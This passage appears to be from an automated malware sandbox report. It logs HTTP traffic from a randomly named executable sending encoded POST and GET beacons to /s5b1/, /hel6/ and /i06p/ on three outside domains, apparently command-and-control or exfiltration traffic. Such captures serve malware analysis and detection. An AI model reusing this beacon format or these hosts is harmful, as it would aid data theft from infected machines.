                                Data Raw: 37 36 3d 56 64 63 54 61 42 4c 64 6b 69 74 54 6e 67 79 69 46 47 70 31 66 64 45 43 78 71 78 70 31 69 58 33 54 4b 2f 78 31 53 33 64 55 53 53 2f 52 49 33 4b 74 55 43 62 76 45 56 36 64 44 6b 6a 72 74 52 65 71 75 38 30 69 32 48 34 78 69 47 48 35 57 7a 78 73 39 6f 62 34 38 68 51 77 47 6d 30 61 71 59 59 68 62 62 55 54 32 75 35 66 71 45 2b 2b 54 5a 74 41 43 4a 51 75 47 64 66 42 44 49 69 30 6d 6e 53 39 6e 54 49 33 55 65 66 72 69 33 79 6c 2f 2b 58 6d 7a 37 49 70 63 74 33 32 48 4b 35 71 6a 4c 31 47 2b 36 70 76 52 53 52 34 30 36 6a 46 61 6b 33 4f 39 6f 62 70 76 52 65 77 66 54 33 49 48 68 49 56 6e 47 2b 6c 78 6b 57 78 57 32 41 67 78 57 39 6b 74 4f 51 50 2b 55 51 6f 53 42 67 4c 59 69 52 54 44 45 36 33 66 55 3d
                                Data Ascii: 76=VdcTaBLdkitTngyiFGp1fdECxqxp1iX3TK/x1S3dUSS/RI3KtUCbvEV6dDkjrtRequ80i2H4xiGH5Wzxs9ob48hQwGm0aqYYhbbUT2u5fqE++TZtACJQuGdfBDIi0mnS9nTI3Uefri3yl/+Xmz7Ipct32HK5qjL1G+6pvRSR406jFak3O9obpvRewfT3IHhIVnG+lxkWxW2AgxW9ktOQP+UQoSBgLYiRTDE63fU=


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                23192.168.2.749727198.50.252.64803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:38:29.694057941 CEST1785OUTPOST /s5b1/ HTTP/1.1
                                Host: www.solisbysobha.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.solisbysobha.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.solisbysobha.net/s5b1/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 56 64 63 54 61 42 4c 64 6b 69 74 54 6e 67 79 69 46 47 70 31 66 64 45 43 78 71 78 70 31 69 58 33 54 4b 2f 78 31 53 33 64 55 53 61 2f 52 36 2f 4b 69 54 57 62 75 45 56 36 44 54 6b 6d 72 74 51 47 71 75 31 38 69 32 44 4f 78 67 4f 48 35 77 48 78 72 4d 6f 62 6a 4d 68 51 74 57 6d 31 58 4b 59 42 68 62 71 66 54 79 4b 35 66 71 45 2b 2b 52 42 74 58 47 64 51 6f 47 64 63 41 44 49 6d 77 6d 6d 2f 39 68 37 69 33 55 53 51 71 54 58 79 6c 62 53 58 6a 42 6a 49 30 4d 74 78 7a 48 4b 68 71 6a 58 71 47 36 61 54 76 53 4f 33 34 7a 4f 6a 46 74 68 31 64 38 59 41 39 64 63 43 78 2b 57 53 4a 32 56 44 4e 58 65 4b 76 32 30 74 73 56 43 6e 75 7a 79 6f 6e 70 76 4c 54 73 67 36 6e 69 31 67 62 2b 47 66 41 68 41 41 76 2f 51 77 76 2b 75 62 6c 50 73 47 34 54 6f 51 61 48 4b 62 76 73 54 71 5a 38 6e 4f 70 56 6a 6f 76 44 4c 66 50 32 4e 52 31 79 50 62 61 47 63 55 35 52 75 7a 72 64 39 6c 64 4d 41 68 6d 2b 4d 75 31 6a 61 5a 4e 42 69 4b 48 59 2b 61 6a 6b 56 6c 4d 73 39 71 61 36 6f 72 39 41 70 72 6e 39 44 62 4f 69 46 4a 76 46 63 72 35 30 6f [TRUNCATED]
                                Data Ascii: 76=VdcTaBLdkitTngyiFGp1fdECxqxp1iX3TK/x1S3dUSa/R6/KiTWbuEV6DTkmrtQGqu18i2DOxgOH5wHxrMobjMhQtWm1XKYBhbqfTyK5fqE++RBtXGdQoGdcADImwmm/9h7i3USQqTXylbSXjBjI0MtxzHKhqjXqG6aTvSO34zOjFth1d8YA9dcCx+WSJ2VDNXeKv20tsVCnuzyonpvLTsg6ni1gb+GfAhAAv/Qwv+ublPsG4ToQaHKbvsTqZ8nOpVjovDLfP2NR1yPbaGcU5Ruzrd9ldMAhm+Mu1jaZNBiKHY+ajkVlMs9qa6or9Aprn9DbOiFJvFcr50oHcj9xmpIWWdr4rJKY8M6u0LoZNtGGTob7GaaIMW9uT+4+sdwolNvXHrNJo7E5kPx265nBVPR8ROn27ezLGU6DcKhvjbJlVGDWrbx8HmMm5RxJ9fKYax0NqrjfRisTkdbROvsk+fny5MMnvYJ+HowFR/0LVeJLuqCwZ5HxTfU5HG9hpytVm2havyalmdRGD0Khv5+jDvBp0CEJDunMy/f/fzvpjnk4To3oAOY/0q5R2+gq0xAyEdgY0QWo/pH3vQRluptWgZ9pdULeaz0fWEn4HbFqyTi1cbJQ/XAI4lJQg5ZZ2EVWEWjwpXjOSG7KqQC4dbnb/PmsysOGMT/EMj5V5sZ3Vqg1xgDIHIPaHOo6zlV1APdp1cfD6h7+RHlXl9vDFe+qpVcfxnXlXXwmIXzT2dEffk05zDa1VstO0rf8NmWNCGk31KKl2520W7BnCbbABrfDgR0AzN0Qt+RtCRu8LnZsYVGofe7eRXlksq0X61XnzbnzSjS6Szx1k3t37ZopFKNe2CmipvGYtY0MkOz3/nE3TSrcshs27L5WLdPOViTXfTqqLuwTrOd/iAIv5BW4Uz5FoeUu8+oTD2G8NRP91293GH8NORmMqkLeCVrjI/tHIbbdIjm0O5K43CNaFDzM8jy1Tz0bIm3dUPTbOcRhWoWKpOyYeejaQ [TRUNCATED]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                24192.168.2.749728198.50.252.64803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:38:32.234188080 CEST481OUTGET /s5b1/?mtJD_=fvdlJ2L&76=Yf0zZ3jBoCdhuzLDLj91Ws8HprJqzGXqNpWi9hWRQAr/e4SYtEvUr1BCdCQtsdxZ1OdzkDb6zzma4zXRjMwopMxEpmqXXuUrncqDeB64G5UYzEp6MWYeviVvJyEh+kzS7xrr7DyksnLe HTTP/1.1
                                Host: www.solisbysobha.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                25192.168.2.74972985.159.66.93803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:38:37.842024088 CEST764OUTPOST /hel6/ HTTP/1.1
                                Host: www.sppsuperplast.online
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.sppsuperplast.online
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.sppsuperplast.online/hel6/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 6c 37 72 53 75 39 36 41 6a 4b 6d 33 73 7a 35 55 62 54 5a 34 53 34 30 6e 50 73 7a 73 36 6f 65 73 72 45 77 39 68 67 64 48 67 73 56 70 4c 72 34 74 4a 6f 61 56 66 4a 78 78 51 75 74 71 75 35 51 63 58 2f 4f 71 73 50 54 4c 30 34 67 6d 51 72 59 33 44 65 65 37 7a 4c 41 6f 30 54 77 38 68 2f 79 4f 49 65 68 48 6a 52 39 4a 6b 71 49 76 30 76 6a 4d 38 7a 71 2b 6a 62 70 35 64 47 70 56 71 34 6c 49 78 6d 55 51 77 4a 32 42 45 2b 30 31 58 34 57 7a 53 52 73 52 72 7a 52 75 6f 46 48 65 73 64 4d 36 4c 45 4c 45 42 7a 6a 4d 59 38 71 78 30 5a 75 41 62 6d 4d 41 77 48 65 2f 68 59 38 4c 65 4d 44 41 4d 54 35 4b 78 75 78 72 52 2f 43 73 48 67 4c 69 35 51 3d 3d
                                Data Ascii: 76=l7rSu96AjKm3sz5UbTZ4S40nPszs6oesrEw9hgdHgsVpLr4tJoaVfJxxQutqu5QcX/OqsPTL04gmQrY3Dee7zLAo0Tw8h/yOIehHjR9JkqIv0vjM8zq+jbp5dGpVq4lIxmUQwJ2BE+01X4WzSRsRrzRuoFHesdM6LELEBzjMY8qx0ZuAbmMAwHe/hY8LeMDAMT5KxuxrR/CsHgLi5Q==


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                26192.168.2.74973085.159.66.93803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:38:40.958497047 CEST784OUTPOST /hel6/ HTTP/1.1
                                Host: www.sppsuperplast.online
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.sppsuperplast.online
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.sppsuperplast.online/hel6/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 6c 37 72 53 75 39 36 41 6a 4b 6d 33 74 51 52 55 63 79 5a 34 44 49 30 6b 41 4d 7a 73 6a 59 65 67 72 45 30 39 68 6a 51 41 67 66 78 70 4c 50 77 74 49 70 61 56 59 4a 78 78 62 4f 74 72 71 35 51 43 58 34 47 49 73 4f 76 4c 30 38 77 6d 51 71 6f 33 44 70 69 34 7a 62 41 51 2f 7a 77 36 38 50 79 4f 49 65 68 48 6a 52 70 77 6b 71 51 76 30 2f 7a 4d 39 58 65 35 71 37 70 36 55 6d 70 56 75 34 6c 45 78 6d 56 67 77 49 72 57 45 38 63 31 58 35 6d 7a 53 6b 4d 57 6b 7a 52 6f 31 56 48 49 6b 59 74 69 54 46 7a 4c 5a 43 50 59 66 37 7a 4c 34 50 7a 69 42 45 41 73 75 57 6d 45 6c 61 59 39 4a 71 65 31 4f 53 39 53 38 4d 46 4b 4f 49 6e 47 4b 79 71 6d 76 71 6c 57 50 33 58 72 43 75 5a 46 4a 4f 46 2f 77 33 70 38 32 6f 41 3d
                                Data Ascii: 76=l7rSu96AjKm3tQRUcyZ4DI0kAMzsjYegrE09hjQAgfxpLPwtIpaVYJxxbOtrq5QCX4GIsOvL08wmQqo3Dpi4zbAQ/zw68PyOIehHjRpwkqQv0/zM9Xe5q7p6UmpVu4lExmVgwIrWE8c1X5mzSkMWkzRo1VHIkYtiTFzLZCPYf7zL4PziBEAsuWmElaY9Jqe1OS9S8MFKOInGKyqmvqlWP3XrCuZFJOF/w3p82oA=


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                27192.168.2.74973185.159.66.93803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:38:43.504518032 CEST1797OUTPOST /hel6/ HTTP/1.1
                                Host: www.sppsuperplast.online
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.sppsuperplast.online
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.sppsuperplast.online/hel6/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 6c 37 72 53 75 39 36 41 6a 4b 6d 33 74 51 52 55 63 79 5a 34 44 49 30 6b 41 4d 7a 73 6a 59 65 67 72 45 30 39 68 6a 51 41 67 66 35 70 4c 64 6f 74 49 4f 32 56 5a 4a 78 78 48 2b 74 6d 71 35 52 65 58 2b 75 4d 73 4f 6a 62 30 36 73 6d 57 4d 63 33 46 59 69 34 39 62 41 51 77 54 77 37 68 2f 79 68 49 65 78 44 6a 52 35 77 6b 71 51 76 30 39 37 4d 37 44 71 35 73 37 70 35 64 47 6f 48 71 34 6b 52 78 6d 63 59 77 4a 65 72 45 4e 38 31 55 5a 32 7a 42 33 6b 57 37 44 52 71 32 56 47 4c 6b 59 70 44 54 46 75 36 5a 43 37 79 66 38 58 4c 38 71 47 37 53 31 49 51 76 56 4f 65 6d 35 45 4d 4f 35 36 49 4a 44 5a 45 2b 74 78 59 49 49 61 35 4f 42 4f 36 72 50 4e 51 54 6c 66 6c 44 64 52 41 4b 75 6f 64 73 32 4a 33 67 4e 76 37 58 55 39 4e 47 46 2f 7a 64 46 4d 6b 42 57 49 4c 6f 48 65 44 2f 4d 5a 41 4b 6c 69 6e 55 4a 6f 32 59 56 79 32 4d 37 41 50 47 30 56 6c 30 45 51 36 2b 6d 45 35 2f 52 6b 6f 4f 78 33 6a 7a 46 30 38 73 6b 73 32 31 47 55 58 70 44 6e 2f 33 4e 73 67 63 70 45 67 41 37 58 74 79 47 6d 78 59 42 4f 50 4f 62 47 66 4e 69 5a [TRUNCATED]
                                Data Ascii: 76=l7rSu96AjKm3tQRUcyZ4DI0kAMzsjYegrE09hjQAgf5pLdotIO2VZJxxH+tmq5ReX+uMsOjb06smWMc3FYi49bAQwTw7h/yhIexDjR5wkqQv097M7Dq5s7p5dGoHq4kRxmcYwJerEN81UZ2zB3kW7DRq2VGLkYpDTFu6ZC7yf8XL8qG7S1IQvVOem5EMO56IJDZE+txYIIa5OBO6rPNQTlflDdRAKuods2J3gNv7XU9NGF/zdFMkBWILoHeD/MZAKlinUJo2YVy2M7APG0Vl0EQ6+mE5/RkoOx3jzF08sks21GUXpDn/3NsgcpEgA7XtyGmxYBOPObGfNiZdUNz9ERH5dAlwC/vGXY0h2XIOW+nm7r+UTBCZpPfms7Ceer5avSZDoGxHO3NN8JAzssShiEkx/uqPVoE607BfyNRrrjGUO03IB56roy2rBcMTzuQKVDIHMw5MsiHLN1d2OCes2KMA5PoTXRYJgCv/KkUaqeMhrNvMb81l+EUOxy6/JXc65VTDiy2fuDReeHyt8Swl4CrkbJ+CevEuO8GDpOBC8xvNxP23B1EpQsGS2LXQGSnLR3UZ3hopJy+L0Wh1Hm+2sIf30SxKbDkq0cTWCv5mSPzEckZxpY89V4OuF/XZGvcncDNRrlyNmVDTMMdXpkQFzV7f6PvHj8JzIXWDvyAxi+IOexDV7INrXhtH7XgV35rXKA7StU+hT1f38JJl/aGhRzlQP/j8SEacwlJuGk5FYyrxjuWNweVVuJkv869Jj1ifdbQATvsTa3k0/N0OnTazvqbJyo45RY4KUUQ9o0mSN55ALzratHbO8JGPrhVMaBr+uEmBsNuw4oeHikgA00DHda+ebDXWWf0N9SQUQutK7NYZU2ZHhZxNlONLvwAlWAjhWx+EhPVYDiAxE7Ua4hl5FyFhdn+uPDcN6gIh+BA2IUMhX3cQqkyw+v8lyvFajqW5Iln+xfFIYD+YN0dgzn7AmpGTw4abYcoydJjYmpTy7RQ/6oVPJ [TRUNCATED]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                28192.168.2.74973285.159.66.93803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:38:46.046056986 CEST485OUTGET /hel6/?76=o5DytMykkaK7sxNXVTYwbJ0nas7Lrf6+xSFmwBlJgutuTdBVL+3Ld5pnGP5bgJpbKreJsN3lh4gHWJ53LIGu8bA2yj0UpLyBdZ5DgjAe+Y8tl6D74j+Er65lZkEVlLJH6zUxwY6EHphi&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.sppsuperplast.online
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:38:46.718200922 CEST225INHTTP/1.1 404 Not Found
                                Server: nginx/1.14.1
                                Date: Mon, 23 Sep 2024 12:38:46 GMT
                                Content-Length: 0
                                Connection: close
                                X-Rate-Limit-Limit: 5s
                                X-Rate-Limit-Remaining: 19
                                X-Rate-Limit-Reset: 2024-09-23T12:38:51.6173239Z


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                29192.168.2.749733142.250.186.51803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:38:51.937959909 CEST740OUTPOST /i06p/ HTTP/1.1
                                Host: www.deefbank.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.deefbank.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.deefbank.net/i06p/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 59 72 49 62 67 36 6f 67 4d 4e 4d 63 59 65 6f 52 46 55 4e 75 6c 67 49 66 52 34 37 4d 42 36 4f 61 41 34 67 4f 48 77 71 72 65 71 7a 6b 4c 61 7a 38 38 69 65 70 72 66 5a 63 73 42 6d 77 4b 54 32 50 62 2b 55 51 6e 49 42 2f 6f 77 71 5a 74 72 63 69 2f 42 78 2f 55 4a 6e 38 47 59 48 6c 6a 59 72 72 6a 4c 61 79 78 6a 31 71 73 58 77 6a 59 75 39 56 68 59 76 47 43 74 61 73 45 50 37 69 38 37 67 43 2b 42 47 47 63 6f 6c 4e 68 6c 34 51 79 65 7a 65 61 34 63 53 68 6c 51 58 76 61 75 2b 76 79 50 77 53 59 6c 36 70 65 5a 6f 6c 64 77 2f 55 73 63 77 4b 6a 2b 68 6b 30 57 71 55 2f 62 54 2b 74 4a 39 4e 4a 79 69 44 67 36 4a 4e 37 61 52 36 6e 52 73 53 77 3d 3d
                                Data Ascii: 76=YrIbg6ogMNMcYeoRFUNulgIfR47MB6OaA4gOHwqreqzkLaz88ieprfZcsBmwKT2Pb+UQnIB/owqZtrci/Bx/UJn8GYHljYrrjLayxj1qsXwjYu9VhYvGCtasEP7i87gC+BGGcolNhl4Qyezea4cShlQXvau+vyPwSYl6peZoldw/UscwKj+hk0WqU/bT+tJ9NJyiDg6JN7aR6nRsSw==
                                Sep 23, 2024 14:38:52.646972895 CEST402INHTTP/1.1 301 Moved Permanently
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Mon, 23 Sep 2024 12:38:52 GMT
                                Location: https://www.deefbank.net/i06p/
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                30192.168.2.749734142.250.186.51803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:38:54.494962931 CEST760OUTPOST /i06p/ HTTP/1.1
                                Host: www.deefbank.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.deefbank.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.deefbank.net/i06p/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 59 72 49 62 67 36 6f 67 4d 4e 4d 63 59 2b 34 52 41 31 4e 75 6a 41 49 41 55 34 37 4d 4b 61 50 79 41 34 73 4f 48 78 76 67 66 66 44 6b 46 61 6a 38 2f 68 47 70 73 66 5a 63 69 68 6d 31 56 6a 32 55 62 2b 51 79 6e 49 4e 2f 6f 77 2b 5a 74 75 67 69 2f 53 4a 34 53 5a 6e 2b 4c 34 48 6e 2b 6f 72 72 6a 4c 61 79 78 6a 68 4d 73 58 59 6a 5a 65 4e 56 68 35 76 42 42 74 61 74 44 50 37 69 71 37 67 4f 2b 42 47 30 63 74 4d 57 68 6d 4d 51 79 62 50 65 65 35 63 52 76 6c 51 52 69 36 76 32 72 6e 71 50 65 71 70 42 72 4f 64 31 67 4f 6f 46 59 36 42 53 51 42 79 4e 36 6c 75 52 51 39 2f 6c 70 4c 55 49 50 49 32 36 4f 43 4f 6f 53 4d 2f 37 33 31 77 6f 45 4e 38 59 38 5a 52 45 4b 46 56 50 4f 68 68 61 38 50 67 2b 7a 74 49 3d
                                Data Ascii: 76=YrIbg6ogMNMcY+4RA1NujAIAU47MKaPyA4sOHxvgffDkFaj8/hGpsfZcihm1Vj2Ub+QynIN/ow+Ztugi/SJ4SZn+L4Hn+orrjLayxjhMsXYjZeNVh5vBBtatDP7iq7gO+BG0ctMWhmMQybPee5cRvlQRi6v2rnqPeqpBrOd1gOoFY6BSQByN6luRQ9/lpLUIPI26OCOoSM/731woEN8Y8ZREKFVPOhha8Pg+ztI=
                                Sep 23, 2024 14:38:55.444797993 CEST402INHTTP/1.1 301 Moved Permanently
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Mon, 23 Sep 2024 12:38:55 GMT
                                Location: https://www.deefbank.net/i06p/
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                31192.168.2.749735142.250.186.51803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:38:57.032861948 CEST1773OUTPOST /i06p/ HTTP/1.1
                                Host: www.deefbank.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.deefbank.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.deefbank.net/i06p/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 59 72 49 62 67 36 6f 67 4d 4e 4d 63 59 2b 34 52 41 31 4e 75 6a 41 49 41 55 34 37 4d 4b 61 50 79 41 34 73 4f 48 78 76 67 66 66 4c 6b 46 70 62 38 2f 41 47 70 74 66 5a 63 71 42 6d 30 56 6a 33 55 62 34 34 32 6e 49 51 45 6f 7a 47 5a 75 49 55 69 72 33 6c 34 63 5a 6e 2b 58 49 48 6d 6a 59 72 36 6a 4c 4b 32 78 6a 78 4d 73 58 59 6a 5a 59 70 56 6a 6f 76 42 48 74 61 73 45 50 37 32 38 37 68 6e 2b 42 65 6b 63 74 41 47 68 56 55 51 79 37 2f 65 63 72 6b 52 6e 6c 51 54 78 4b 75 77 72 6e 75 75 65 71 6c 6e 72 4e 42 50 67 4d 6f 46 64 75 45 72 45 7a 2b 52 6f 45 57 5a 62 62 36 41 69 61 45 44 48 66 61 5a 52 77 71 4c 4f 37 6a 4e 79 32 70 67 43 36 49 62 70 72 64 74 4b 6d 46 72 4f 48 41 6c 37 2f 38 46 74 6f 5a 4e 6c 57 37 64 50 34 6a 54 32 50 32 59 4e 6a 51 77 76 74 6d 31 33 2b 6b 55 38 67 79 54 67 64 38 6a 75 4d 4c 48 57 77 4c 79 63 46 62 4b 6b 42 58 4d 6f 72 72 54 43 71 51 44 6a 52 66 64 41 4c 4b 45 42 64 79 47 55 65 6d 6f 50 53 45 30 30 74 7a 47 69 78 50 6b 4b 55 37 59 78 79 6e 73 6c 48 36 37 4d 30 45 61 4c 53 4e [TRUNCATED]
                                Data Ascii: 76=YrIbg6ogMNMcY+4RA1NujAIAU47MKaPyA4sOHxvgffLkFpb8/AGptfZcqBm0Vj3Ub442nIQEozGZuIUir3l4cZn+XIHmjYr6jLK2xjxMsXYjZYpVjovBHtasEP7287hn+BekctAGhVUQy7/ecrkRnlQTxKuwrnuueqlnrNBPgMoFduErEz+RoEWZbb6AiaEDHfaZRwqLO7jNy2pgC6IbprdtKmFrOHAl7/8FtoZNlW7dP4jT2P2YNjQwvtm13+kU8gyTgd8juMLHWwLycFbKkBXMorrTCqQDjRfdALKEBdyGUemoPSE00tzGixPkKU7YxynslH67M0EaLSNMafIucr4GpPRQE1Ktz98Pbndgwh9eti40BrKeI9ebNq23nYHU1H1A5kuOvd9tfmP7HBwUP5rL7dAywnCtd+EvppQJkAe5i5ID85yB0K3c125MVJ5Q+rmFrDchCI2czP1yNnzMmeCM5j9G7YD7Htj8XIubj8IsfpBGea/L7a2v+LI4mn+kBm0+RJ/k7Bl0zmKcY/I6QaqLbQmJko8dC9Qv/lVuf3WqgYj5dU+jOfmtl63Tb7tXinhMe13zaFWpLVORYGpRs9TiuYXTfWH5a4VqatyqqNHPOkyjDD1cf+lWadUzxb5QJnEAvp4ehV+OhpoZQQNmjbwqJ/0NCwlDF+aSozhn/g5Dslj5xzpfsNawlXB+H0hl1wHiOgiqUQWWSYmYRLf+UEWlybiBetCs3+gcZl9uWb23R+xtE2qirEb0edLsHzpwFoAx+ymck6JykJ2Nd23D4q4VW4UuEPLPBFgPOeRGCLclmBdrr3NHMJQpyjopbnOUJIHAo0FYvnsUHSD5W4yHm69OK8kROa1mdQ/M3rc9B9diCKvcOBDFqc0Me6yhxMdEJ28MVbOEdjEzaA2QUd4PYDM6bGtNZGdiM8zuCeZZ22AYPEulGHs8XosM+Hz5ed6NszzHxEy7IBzuTIt4b4TGw2Jh2+ZXySa4Hl7w7l8u70zGlMKjM [TRUNCATED]
                                Sep 23, 2024 14:38:57.758460999 CEST402INHTTP/1.1 301 Moved Permanently
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Mon, 23 Sep 2024 12:38:57 GMT
                                Location: https://www.deefbank.net/i06p/
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                32192.168.2.749736142.250.186.51803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
